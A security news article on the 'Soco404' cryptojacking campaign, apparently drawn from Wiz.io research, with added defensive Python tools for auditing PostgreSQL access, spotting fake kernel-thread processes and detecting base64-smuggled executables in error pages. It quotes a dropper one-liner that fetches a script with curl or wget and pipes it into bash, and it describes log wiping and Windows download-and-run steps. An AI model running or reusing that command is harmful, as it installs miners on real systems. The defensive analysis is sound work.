Beware of Fake Error Pages That Infect Linux and Windows Systems With Platform-Specific Malware


A new wave of cryptojacking attacks is exploiting the humble 404 error page to sneak malicious binaries past defenders. Dubbed “Soco404,” the campaign embeds base64-encoded payloads inside seemingly innocuous error screens hosted on Google Sites and compromised Tomcat servers, then detonates them on both Linux and Windows hosts.

Because the malicious content is tucked between normal HTML tags, traditional URL filtering and static scanners often miss the threat until CPU cycles mysteriously disappear.

The operation first surfaced in mid-2025, but investigators believe it is an evolution of earlier miner bots that preyed on weak Tomcat credentials and unpatched Atlassian Confluence instances.


Wiz.io researchers identified the latest variant while monitoring anomalous shell activity emanating from publicly exposed PostgreSQL databases, a service that nearly one-third of cloud tenants leave open to the internet.

Once inside, the attackers weaponize PostgreSQL’s COPY FROM PROGRAM feature to run arbitrary commands, pivoting laterally across mixed-OS estates and spinning up fresh miners at scale.
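The exposure described above starts with who is allowed to connect at all. The following is an added example, not code from the Wiz.io report or from the campaign: a small auditor for a PostgreSQL pg_hba.conf that flags entries accepting connections from any address and entries that use the trust method (no authentication) for non-loopback clients. The sample configuration is constructed for the demonstration. Note that COPY FROM PROGRAM is only available to superusers and members of the pg_execute_server_program role, so keeping application roles out of both groups limits what an attacker can do even after a successful login.

```python
import ipaddress

# Constructed pg_hba.conf sample (not from the report): a mix of safe and risky entries.
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS             METHOD
local   all       all                       peer
host    all       all   127.0.0.1/32        scram-sha-256
host    all       all   0.0.0.0/0           trust
host    all       all   ::/0                md5
host    app       app   10.0.0.0 255.0.0.0  scram-sha-256
hostssl all       all   all                 password
"""

HOST_TYPES = {"host", "hostssl", "hostnossl", "hostgssenc", "hostnogssenc"}


def _looks_like_ip(token):
    try:
        ipaddress.ip_address(token)
        return True
    except ValueError:
        return False


def _parse_entry(line):
    """Split one pg_hba.conf line into (type, database, user, network, method).
    network is an ip_network object, the string 'all', or None for hostnames,
    samehost/samenet keywords and 'local' entries (which have no address)."""
    tokens = line.split()
    if tokens[0] not in HOST_TYPES or len(tokens) < 5:
        return None
    addr = tokens[3]
    # Old-style entries put the netmask in its own column: ADDRESS NETMASK METHOD.
    if _looks_like_ip(tokens[4]):
        addr = f"{addr}/{tokens[4]}"
        method = tokens[5] if len(tokens) > 5 else ""
    else:
        method = tokens[4]
    if addr == "all":
        network = "all"
    else:
        try:
            network = ipaddress.ip_network(addr, strict=False)
        except ValueError:
            network = None
    return tokens[0], tokens[1], tokens[2], network, method


def audit_pg_hba(text):
    """Return findings for entries reachable from any address or using 'trust'
    for non-loopback clients. Each finding carries the 1-based line number."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        entry = _parse_entry(line)
        if entry is None:
            continue
        _conn_type, _database, _user, network, method = entry
        reasons = []
        world_open = network == "all" or (network is not None and network.prefixlen == 0)
        if world_open:
            reasons.append("accepts connections from any address")
        loopback = network not in ("all", None) and network.is_loopback
        if method == "trust" and not loopback:
            reasons.append("trust: no authentication required")
        if reasons:
            findings.append({
                "line": lineno,
                "severity": "high" if method == "trust" else "medium",
                "entry": line,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_pg_hba(SAMPLE_PG_HBA):
        print(f"line {finding['line']} [{finding['severity']}]: {finding['entry']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

Run it against a real file with `audit_pg_hba(open("/etc/postgresql/<version>/main/pg_hba.conf").read())`; the same parser handles the older two-column address/netmask form, so legacy configurations are not silently skipped.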

Beyond misconfigured databases, the adversary abuses already-owned web servers to masquerade as trusted infrastructure. Compromised Korean transportation sites deliver Linux droppers (soco.sh) and Windows loaders (ok.exe) that immediately erase themselves to hamper forensics.

Each branch of the malware family disguises itself as a legitimate process (sd-pam, kworker/R-rcu_p, or a random eight-character Windows service name) while scheduling cron jobs and shell-init hooks on Linux, or disabling the Windows Event Log on Windows, to persist undetected.
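Kernel-thread names such as kworker/R-rcu_p or cpuhp/1 are a weak disguise, because genuine kernel threads have properties a userland process cannot fake: they are children of kthreadd (PID 2), have an empty /proc/<pid>/cmdline, and their /proc/<pid>/exe link does not resolve. The following is an added example, not code from Wiz.io or from the campaign: a Linux checker that walks a /proc tree and reports processes whose name looks like a kernel thread but which fail those checks. The regular expression of kernel-thread name prefixes and the constructed /proc lookalike used for the demonstration are assumptions made for this example.

```python
import os
import re
import tempfile

# Name prefixes that only genuine kernel threads should carry (assumed list for this example).
KERNEL_THREAD_NAME = re.compile(r"^(kworker/|ksoftirqd/|migration/|cpuhp/|rcu_|kswapd)")
KTHREADD_PID = 2


def _read_status(proc_root, pid):
    fields = {}
    with open(os.path.join(proc_root, str(pid), "status")) as f:
        for line in f:
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
    return fields


def find_kernel_thread_impostors(proc_root="/proc"):
    """Report processes named like kernel threads that have a userland parent,
    a command line, or a resolvable exe link. Results are sorted by PID."""
    findings = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit() or int(entry) == KTHREADD_PID:
            continue
        pid = int(entry)
        try:
            status = _read_status(proc_root, pid)
        except OSError:
            continue  # the process exited while we were scanning
        name = status.get("Name", "")
        if not KERNEL_THREAD_NAME.match(name):
            continue
        ppid = int(status.get("PPid", "-1"))
        try:
            with open(os.path.join(proc_root, entry, "cmdline"), "rb") as f:
                cmdline = f.read()
        except OSError:
            cmdline = b""
        exe_link = os.path.join(proc_root, entry, "exe")
        # os.path.exists follows the link; for a real kernel thread it never resolves.
        # Without root, exe links of other users' processes are unreadable, so run as root.
        exe = os.readlink(exe_link) if os.path.exists(exe_link) else None
        if ppid != KTHREADD_PID or cmdline or exe:
            findings.append({
                "pid": pid, "name": name, "ppid": ppid,
                "cmdline": cmdline.replace(b"\0", b" ").decode(errors="replace").strip(),
                "exe": exe,
            })
    return sorted(findings, key=lambda f: f["pid"])


def _write_proc_entry(root, pid, name, ppid, cmdline=b"", exe_target=None):
    """Create a minimal /proc/<pid> lookalike (status, cmdline, optional exe link)."""
    d = os.path.join(root, str(pid))
    os.makedirs(d)
    with open(os.path.join(d, "status"), "w") as f:
        f.write(f"Name:\t{name}\nPid:\t{pid}\nPPid:\t{ppid}\n")
    with open(os.path.join(d, "cmdline"), "wb") as f:
        f.write(cmdline)
    if exe_target:
        os.symlink(exe_target, os.path.join(d, "exe"))


def scan_constructed_tree():
    """Build a constructed /proc lookalike in a temp dir and scan it (demo input only)."""
    with tempfile.TemporaryDirectory() as root:
        fake_bin = os.path.join(root, "fakebin", "miner")
        os.makedirs(os.path.dirname(fake_bin))
        open(fake_bin, "w").close()
        # Genuine kernel thread: child of kthreadd, no cmdline, no resolvable exe.
        _write_proc_entry(root, 123, "kworker/0:1", ppid=2)
        # Ordinary user process: its name does not look like a kernel thread, so it is ignored.
        _write_proc_entry(root, 777, "bash", ppid=1, cmdline=b"bash\0", exe_target=fake_bin)
        # Impostors in the style the article describes: kernel-thread names on userland binaries.
        _write_proc_entry(root, 4242, "kworker/R-rcu_p", ppid=1,
                          cmdline=b"/tmp/.x/kworker\0", exe_target=fake_bin)
        _write_proc_entry(root, 5150, "cpuhp/1", ppid=4242, cmdline=b"cpuhp/1\0")
        return find_kernel_thread_impostors(root)


if __name__ == "__main__":
    for hit in scan_constructed_tree():
        print(hit)
```

On a live host call `find_kernel_thread_impostors()` as root; each hit includes the parent PID, command line and executable path, which is enough to pivot to the cron entries and shell-init hooks mentioned above.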

Corporate dashboards register nothing more than a gradual rise in power bills and a dip in performance.

Infection via HTML-Smuggled 404 Pages

The heart of Soco404’s delivery chain is a loader that fetches a fake error page from https://www.fastsoco.top/1.

Attack flow (Source – Wiz.io)

Hidden between a pair of custom exe101 markers lies a base64 blob that the loader decodes directly into memory, bypassing disk-based scanners.
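Because the page itself is plain HTML, a proxy, sandbox or web-content scanner can catch this technique by decoding any long base64 run in a fetched page and checking whether the result starts with an executable header. The following is an added example, not code from Wiz.io or from the campaign: a detector that scans page text for base64 runs of at least 64 characters, repairs missing padding, and reports runs that decode to an ELF or PE (MZ) header. It is more general than the exe101 markers described above, since it does not depend on knowing the marker text. The fake 404 page and the payload stand-ins (only the header bytes are real, the rest is filler text) are constructed for the demonstration.

```python
import base64
import binascii
import re

# Magic bytes of the two executable formats the campaign delivers.
EXECUTABLE_MAGIC = {b"\x7fELF": "ELF", b"MZ": "PE/MZ"}

# Base64 runs shorter than this are almost always legitimate (tokens, small inline images).
MIN_BLOB_LEN = 64
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % MIN_BLOB_LEN)

# Constructed payload stand-ins: only the headers are real, the rest is filler text.
_ELF_SAMPLE = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"constructed-sample-not-a-real-binary" * 2
_PE_SAMPLE = b"MZ\x90\x00" + b"constructed-sample-not-a-real-binary" * 2

# Constructed fake 404 page in the style the article describes (markers and blobs are made up).
SAMPLE_404_PAGE = f"""<html><head><title>404 Not Found</title></head>
<body><h1>Not Found</h1><p>The requested URL was not found on this server.</p>
<!-- exe101 -->
{base64.b64encode(_ELF_SAMPLE).decode()}
<!-- exe101 -->
<div style="display:none">{base64.b64encode(_PE_SAMPLE).decode()}</div>
</body></html>
"""

CLEAN_404_PAGE = "<html><body><h1>404 Not Found</h1><p>Nothing to see here.</p></body></html>"


def decode_blob(blob):
    """Decode a base64 run, repairing missing padding; return None if it is not valid base64."""
    core = blob.rstrip("=")
    core += "=" * (-len(core) % 4)
    try:
        return base64.b64decode(core, validate=True)
    except (binascii.Error, ValueError):
        return None


def find_smuggled_executables(html):
    """Scan page text for base64 runs that decode to an ELF or PE header.
    Each hit records the offset in the page, the format and the decoded size."""
    hits = []
    for m in BASE64_RUN.finditer(html):
        raw = decode_blob(m.group(0))
        if raw is None:
            continue
        for magic, fmt in EXECUTABLE_MAGIC.items():
            if raw.startswith(magic):
                hits.append({"offset": m.start(), "format": fmt, "size": len(raw)})
                break
    return hits


if __name__ == "__main__":
    for hit in find_smuggled_executables(SAMPLE_404_PAGE):
        print(f"{hit['format']} payload of {hit['size']} bytes at offset {hit['offset']}")
    print("clean page:", find_smuggled_executables(CLEAN_404_PAGE))
```

Feeding HTTP response bodies through `find_smuggled_executables` (for example from a proxy log replay) turns the loader's trick against it: an error page that carries an executable is a high-confidence alert regardless of which URL served it.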

On Linux, the initial command resembles the one-liner below (the host address is omitted):

sh -c "(curl http://:8080/soco.sh||wget -q -O- http://:8080/soco.sh)|bash"

The script generates a random filename, kills competing miners, wipes /var/log/wtmp, and, if running as root, enables hugepages and tweaks model-specific registers for Ryzen or Intel CPUs to squeeze every hash from the silicon.

A Go stub then re-executes itself as cpuhp/1, phones home to the 404 host, and launches an XMRig worker against the c3pool and moneroocean pools using wallet 8BmVXb…eyZ.

Windows hosts follow a parallel path: certutil, Invoke-WebRequest, or curl drops ok.exe into C:\Users\Public, spawns conhost.exe, injects the main miner, and silently deletes the original file after a three-second delay implemented with the choice command.

Both branches chatter over local sockets for resilience and keep watchdog threads ready to respawn if killed, ensuring the fake error page keeps harvesting coins long after the 404 message fades from view.
